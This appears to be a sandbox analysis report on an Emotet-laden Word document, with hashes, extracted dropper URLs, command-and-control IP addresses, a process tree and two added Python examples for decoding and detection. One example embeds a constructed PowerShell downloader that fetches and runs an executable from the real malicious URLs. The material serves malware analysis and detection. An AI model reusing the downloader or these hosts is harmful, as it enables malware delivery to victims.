Analysis

  • max time kernel
    20s
  • max time network
    15s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    15-10-2020 07:37

General

  • Target

    aa7280fb05501f752d412d103bd48c86094cc49ea8f3d9f6b3ab458a64997f63.doc

  • Size

    142KB

  • MD5

    0b5d5c4468a31e83e1ec8a0d8b120496

  • SHA1

    68ac3e73c7bb88172984109977a8dc0f2c095522

  • SHA256

    aa7280fb05501f752d412d103bd48c86094cc49ea8f3d9f6b3ab458a64997f63

  • SHA512

    44b5682ac2f14a0de257bcab0eb42fc725536be8d9ecc432ca3a19ff3425c9b867a85b3d3b37cb1416f76b51d86ae2fcb563641f9fd6b18de0b34024dbc48fd1

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Source
    exe.dropper
  • URLs
    https://ziaonlinetutor.com/wp-content/a/
    https://bharatlearningsolutions.com/content/MNd/
    https://trungtammtc.com/wp-admin/LP/
    http://bigprint.pictures/cgi-bin/o/
    https://avozdecamacari.com/home/000~ROOT~000/dev/shm/E/
    https://calculafacturaluz.com/sys-cache/9W/
    http://evisualsoft-001-site3.atempurl.com/wp-content/C7/
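
The exe.dropper URL list above is what a config extractor recovers from the base64-encoded PowerShell stage that WINWORD.EXE spawns (PowerShell's -EncodedCommand takes UTF-16LE text, base64-encoded, and accepts any unambiguous prefix of the switch name, which is why "-ENCOD" works). The page does not reproduce the real encoded argument, so the script below is an added example, not the sandbox's extractor and not the sample's own code: it builds a constructed stand-in downloader that carries the seven URLs above in the separator-joined form such stages commonly use, encodes it the way the command line would, and then shows the decode-and-extract direction an analyst actually needs. The drop path is taken from the process tree on this page; the separator character, the size check and the helper names are assumptions.

```python
import base64
import re

# Seven download locations from the extracted exe.dropper config above.
DROPPER_URLS = [
    "https://ziaonlinetutor.com/wp-content/a/",
    "https://bharatlearningsolutions.com/content/MNd/",
    "https://trungtammtc.com/wp-admin/LP/",
    "http://bigprint.pictures/cgi-bin/o/",
    "https://avozdecamacari.com/home/000~ROOT~000/dev/shm/E/",
    "https://calculafacturaluz.com/sys-cache/9W/",
    "http://evisualsoft-001-site3.atempurl.com/wp-content/C7/",
]

# Constructed stand-in for the downloader stage (assumption: the page does not
# reproduce the real -ENCOD argument). It mimics the usual shape only: a
# separator-joined URL list split at runtime, each URL tried in order until a
# download of plausible size succeeds, which is then executed.
SAMPLE_SCRIPT = (
    "$u='" + "@".join(DROPPER_URLS) + "'.Split('@');"
    + "$p=$env:USERPROFILE+'\\Owgy_pm\\Gtgm_y5\\X_ec45.exe';"
    + "foreach($x in $u){try{(New-Object Net.WebClient).DownloadFile($x,$p);"
    + "if((Get-Item $p).Length -ge 30000){Start-Process $p;break}}catch{}}"
)


def encode_powershell_command(script: str) -> str:
    """Encode as powershell.exe -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell_command(blob: str) -> str:
    """Inverse of the above; tolerates stripped base64 padding and a UTF-16 BOM."""
    blob = blob.strip()
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-16-le").lstrip("\ufeff")


# -e / -ec / -enc / -ENCOD / -EncodedCommand, any case, followed by the blob.
# "-e" must be followed by "c" or "n..." so -ep / -ExecutionPolicy do not match.
ENCODED_SWITCH_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|n\w*)?\s+([A-Za-z0-9+/=]+)")
URL_RE = re.compile(r"(?i)https?://[^\s'\"@;(){}]+")


def encoded_blob_from_cmdline(cmdline: str):
    """Return the base64 argument of an encoded-command switch, or None."""
    m = ENCODED_SWITCH_RE.search(cmdline)
    return m.group(1) if m else None


def extract_dropper_urls(cmdline: str) -> list:
    """Decode the encoded stage in a command line and list its URLs in order."""
    blob = encoded_blob_from_cmdline(cmdline)
    if blob is None:
        return []
    script = decode_powershell_command(blob)
    return list(dict.fromkeys(URL_RE.findall(script)))  # de-duplicate, keep order


def build_sample_command_line() -> str:
    """Command line in the form seen in the process tree, with the sample stage."""
    return "POwersheLL -ENCOD " + encode_powershell_command(SAMPLE_SCRIPT)


if __name__ == "__main__":
    for url in extract_dropper_urls(build_sample_command_line()):
        print(url)
```

Run the decoder over the real command line from process creation telemetry (Sysmon event 1, or the CommandLine field of a 4688 event with command-line auditing on) rather than this sample; the order of the recovered URLs matters, because the stage walks them top to bottom and the first host that still serves the payload is the one a victim actually contacts.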

Extracted

  • Family
    emotet
  • Botnet
    Epoch1
  • C2
    188.157.101.114:80
    192.175.111.214:8080
    95.85.33.23:8080
    192.232.229.54:7080
    181.30.61.163:443
    186.70.127.199:8090
    200.127.14.97:80
    70.169.17.134:80
    24.232.228.233:80
    172.104.169.32:8080
    50.28.51.143:8080
    177.73.0.98:443
    149.202.72.142:7080
    37.187.161.206:8080
    202.29.239.162:443
    213.197.182.158:8080
    202.134.4.210:7080
    190.24.243.186:80
    201.213.177.139:80
    105.209.235.113:8080
  • rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Emotet Payload 4 IoCs

    Detects Emotet payload in memory.

  • Blacklisted process makes network request 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 280 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\aa7280fb05501f752d412d103bd48c86094cc49ea8f3d9f6b3ab458a64997f63.doc"
    1⤵
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1000
  • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
    POwersheLL -ENCOD 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
    1⤵
    • Process spawned unexpected child process
    • Blacklisted process makes network request
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1568
    • C:\Users\Admin\Owgy_pm\Gtgm_y5\X_ec45.exe
      "C:\Users\Admin\Owgy_pm\Gtgm_y5\X_ec45.exe"
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:360
      • C:\Windows\SysWOW64\nsi\FXSEXT32.exe
        "C:\Windows\SysWOW64\nsi\FXSEXT32.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        PID:924
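
The process tree above is the whole infection chain in four events: an Office process spawning a PowerShell with an encoded command ("Process spawned unexpected child process"), PowerShell launching an executable from under the user profile ("Executes dropped EXE"), and that executable re-launching a byte-identical copy of itself from a new subdirectory of SysWOW64 (the three files in Downloads share one SHA256). The following is an added example, not the sandbox's own signature logic: it replays constructed process-creation events that mirror this tree (PIDs, image paths and hashes from the page; the encoded blob is a placeholder and the rule names are assumptions) and shows how each signature can be expressed as a parent/child rule plus a lineage walk back to the document.

```python
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str
    sha256: str = ""   # empty when the source telemetry carried no hash


WINWORD = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
DOC = r"C:\Users\Admin\AppData\Local\Temp\aa7280fb05501f752d412d103bd48c86094cc49ea8f3d9f6b3ab458a64997f63.doc"
DROPPED = r"C:\Users\Admin\Owgy_pm\Gtgm_y5\X_ec45.exe"
COPY = r"C:\Windows\SysWOW64\nsi\FXSEXT32.exe"
PAYLOAD_SHA256 = "7caa834892838fdb95a41b8395b7a11789074da59640c5703a20790cc8646cfb"

# Constructed events mirroring the report's process tree. The parent of
# WINWORD.EXE (PID 500) and the encoded blob are placeholders.
EVENTS = [
    ProcEvent(1000, 500, WINWORD, '"' + WINWORD + '" /n "' + DOC + '"'),
    ProcEvent(1568, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe",
              "POwersheLL -ENCOD " + "JABhAD0AJwB4ACcA" * 3),
    ProcEvent(360, 1568, DROPPED, '"' + DROPPED + '"', PAYLOAD_SHA256),
    ProcEvent(924, 360, COPY, '"' + COPY + '"', PAYLOAD_SHA256),
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# -e / -ec / -enc / -ENCOD / -EncodedCommand followed by a base64-looking blob.
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|n\w*)?\s+[A-Za-z0-9+/=]{20,}")
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def basename(image: str) -> str:
    return ntpath.basename(image).lower()


def evaluate(events) -> list:
    """Return (pid, rule) pairs for every event that trips a rule."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        child = basename(e.image)
        image = e.image.lower()
        # Office should never need a script host; a macro or exploit did this.
        if parent and basename(parent.image) in OFFICE_APPS and child in SCRIPT_HOSTS:
            findings.append((e.pid, "office_spawns_script_host"))
        if child == "powershell.exe" and ENCODED_RE.search(e.cmdline):
            findings.append((e.pid, "powershell_encoded_command"))
        # A script host starting an EXE that lives under a user profile.
        if parent and basename(parent.image) in SCRIPT_HOSTS and image.startswith("c:\\users\\"):
            findings.append((e.pid, "script_host_runs_exe_from_user_profile"))
        # Same bytes as the parent, relaunched from a System32/SysWOW64 path:
        # the payload copied itself into the system directory and re-executed.
        if (parent and e.sha256 and e.sha256 == parent.sha256
                and image.startswith(SYSTEM_DIRS) and image != parent.image.lower()):
            findings.append((e.pid, "self_copy_executed_from_system_dir"))
    return findings


def lineage(events, pid: int) -> list:
    """Image names from the given PID up to the root the telemetry knows about."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(ntpath.basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain


if __name__ == "__main__":
    for pid, rule in evaluate(EVENTS):
        print(pid, rule, "<-".join(lineage(EVENTS, pid)))
```

The hash-equality rule is the one worth keeping even when the other three fire on noise: a process whose SHA256 matches its parent but whose image sits in a freshly created subdirectory of SysWOW64 is almost never legitimate software, and it is independent of how the first stage was delivered.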

Network

MITRE ATT&CK Matrix

Downloads

  • C:\Users\Admin\Owgy_pm\Gtgm_y5\X_ec45.exe
    MD5

    4b4ad9b98f2c90eec2748c2705765f9e

    SHA1

    d74849e36e5c0778181f9038ce2850d15cb5704c

    SHA256

    7caa834892838fdb95a41b8395b7a11789074da59640c5703a20790cc8646cfb

    SHA512

    88b8fdc693664641388e7b6e270961e86ecac98213f1c7e765d6ae822e32902de2f660d67d51e08a2250271599bf22cc3259c608ba73ceb2172ad3a3995fb9f6

  • C:\Users\Admin\owgY_PM\gtGm_Y5\X_ec45.exe
    MD5

    4b4ad9b98f2c90eec2748c2705765f9e

    SHA1

    d74849e36e5c0778181f9038ce2850d15cb5704c

    SHA256

    7caa834892838fdb95a41b8395b7a11789074da59640c5703a20790cc8646cfb

    SHA512

    88b8fdc693664641388e7b6e270961e86ecac98213f1c7e765d6ae822e32902de2f660d67d51e08a2250271599bf22cc3259c608ba73ceb2172ad3a3995fb9f6

  • C:\Windows\SysWOW64\nsi\FXSEXT32.exe
    MD5

    4b4ad9b98f2c90eec2748c2705765f9e

    SHA1

    d74849e36e5c0778181f9038ce2850d15cb5704c

    SHA256

    7caa834892838fdb95a41b8395b7a11789074da59640c5703a20790cc8646cfb

    SHA512

    88b8fdc693664641388e7b6e270961e86ecac98213f1c7e765d6ae822e32902de2f660d67d51e08a2250271599bf22cc3259c608ba73ceb2172ad3a3995fb9f6

  • memory/360-15-0x00000000003C0000-0x00000000003DF000-memory.dmp
    Filesize

    124KB

  • memory/360-16-0x00000000003E0000-0x00000000003FE000-memory.dmp
    Filesize

    120KB

  • memory/360-13-0x0000000000000000-mapping.dmp
  • memory/924-21-0x00000000005A0000-0x00000000005BE000-memory.dmp
    Filesize

    120KB

  • memory/924-20-0x0000000000350000-0x000000000036F000-memory.dmp
    Filesize

    124KB

  • memory/924-18-0x0000000000000000-mapping.dmp
  • memory/1000-4-0x0000000007D40000-0x0000000007F40000-memory.dmp
    Filesize

    2.0MB

  • memory/1000-2-0x0000000009510000-0x0000000009514000-memory.dmp
    Filesize

    16KB

  • memory/1568-8-0x000000001AD40000-0x000000001AD41000-memory.dmp
    Filesize

    4KB

  • memory/1568-12-0x000000001B970000-0x000000001B971000-memory.dmp
    Filesize

    4KB

  • memory/1568-11-0x000000001AB30000-0x000000001AB31000-memory.dmp
    Filesize

    4KB

  • memory/1568-10-0x0000000001E20000-0x0000000001E21000-memory.dmp
    Filesize

    4KB

  • memory/1568-9-0x00000000022E0000-0x00000000022E1000-memory.dmp
    Filesize

    4KB

  • memory/1568-7-0x0000000001E50000-0x0000000001E51000-memory.dmp
    Filesize

    4KB

  • memory/1568-6-0x000007FEE9B90000-0x000007FEEA57C000-memory.dmp
    Filesize

    9.9MB